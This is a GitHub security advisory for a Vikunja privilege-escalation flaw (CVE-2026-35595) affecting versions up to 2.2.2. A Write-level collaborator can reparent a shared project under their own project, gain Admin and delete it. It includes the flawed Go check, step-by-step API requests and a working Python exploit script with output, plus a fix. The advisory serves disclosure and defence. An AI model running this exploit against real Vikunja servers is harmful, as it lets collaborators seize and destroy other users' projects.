Skip to content

Vikunja vulnerable to Privilege Escalation via Project Reparenting

High severity GitHub Reviewed Published Apr 9, 2026 in go-vikunja/vikunja • Updated Apr 10, 2026

Package

gomod code.vikunja.io/api (Go)

Affected versions

<= 2.2.2

Patched versions

2.3.0

Description

Summary

A user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access.

Details

The CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.

When a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.

if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
    newProject := &Project{ID: p.ParentProjectID}
    can, err := newProject.CanWrite(s, a)  // Only checks Write, not Admin
    if err != nil {
        return false, err
    }
    if !can {
        return false, ErrGenericForbidden{}
    }
}

Proof of Concept

Tested on Vikunja v2.2.2.

1. victim creates "Parent Project" (id=3)
2. victim creates "Secret Child" (id=4) under Parent Project
3. victim shares Parent Project with attacker at Write level (permission=1)
   -> attacker inherits Write on Secret Child (no direct share)
4. attacker creates own "Attacker Root" project (id=5)
5. attacker verifies: DELETE /api/v1/projects/4 -> 403 Forbidden
6. attacker sends: POST /api/v1/projects/4 {"title":"Secret Child","parent_project_id":5}
   -> 200 OK (reparenting succeeds, only requires Write)
7. attacker sends: DELETE /api/v1/projects/4 -> 200 OK
   -> Project deleted. victim gets 404.

import requests                                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                                                
TARGET = "http://localhost:3456"                                                                                                                                                                                                                                                                                 
API = f"{TARGET}/api/v1"  
                                        
def login(u, p):                     
    return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]
                                        
def h(token):  
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
                                                                                                                                                                                                                                                                                                                    
victim_token = login("victim", "Victim123!")
attacker_token = login("attacker", "Attacker123!")                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                
# victim creates parent -> child project hierarchy                                                                                                                                                                                                                                                               
parent = requests.put(f"{API}/projects", headers=h(victim_token),
                    json={"title": "Parent Project"}).json()
child = requests.put(f"{API}/projects", headers=h(victim_token),
                    json={"title": "Secret Child", "parent_project_id": parent["id"]}).json()

# victim shares parent with attacker at Write (attacker inherits Write on child)
requests.put(f"{API}/projects/{parent['id']}/users", headers=h(victim_token),
            json={"username": "attacker", "permission": 1})

# attacker creates own root project
own = requests.put(f"{API}/projects", headers=h(attacker_token),
                    json={"title": "Attacker Root"}).json()

# before: attacker cannot delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE before reparent: {r.status_code}")  # 403

# exploit: reparent child under attacker's project
r = requests.post(f"{API}/projects/{child['id']}", headers=h(attacker_token),
                json={"title": "Secret Child", "parent_project_id": own["id"]})
print(f"Reparent: {r.status_code}")  # 200

# after: attacker can now delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE after reparent: {r.status_code}")  # 200 - escalated to Admin

# victim lost access
r = requests.get(f"{API}/projects/{child['id']}", headers=h(victim_token))
print(f"Victim access: {r.status_code}")  # 404 - project gone

Output:

DELETE before reparent: 403
Reparent: 200
DELETE after reparent: 200
Victim access: 404

The attacker escalated from inherited Write to Admin by reparenting, then deleted the victim's project.

Impact

Any user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users' access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.

Recommended Fix

Require Admin permission instead of Write when changing parent_project_id:

if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
    newProject := &Project{ID: p.ParentProjectID}
    can, err := newProject.IsAdmin(s, a)
    if err != nil {
        return false, err
    }
    if !can {
        return false, ErrGenericForbidden{}
    }
    canAdmin, err := p.IsAdmin(s, a)
    if err != nil {
        return false, err
    }
    if !canAdmin {
        return false, ErrGenericForbidden{}
    }
}

Found and reported by aisafe.io

References

@kolaente kolaente published to go-vikunja/vikunja Apr 9, 2026
Published to the GitHub Advisory Database Apr 10, 2026
Reviewed Apr 10, 2026
Published by the National Vulnerability Database Apr 10, 2026
Last updated Apr 10, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

Improper Privilege Management

The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. Learn more on MITRE.

CVE ID

CVE-2026-35595

GHSA ID

GHSA-2vq4-854f-5c72

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.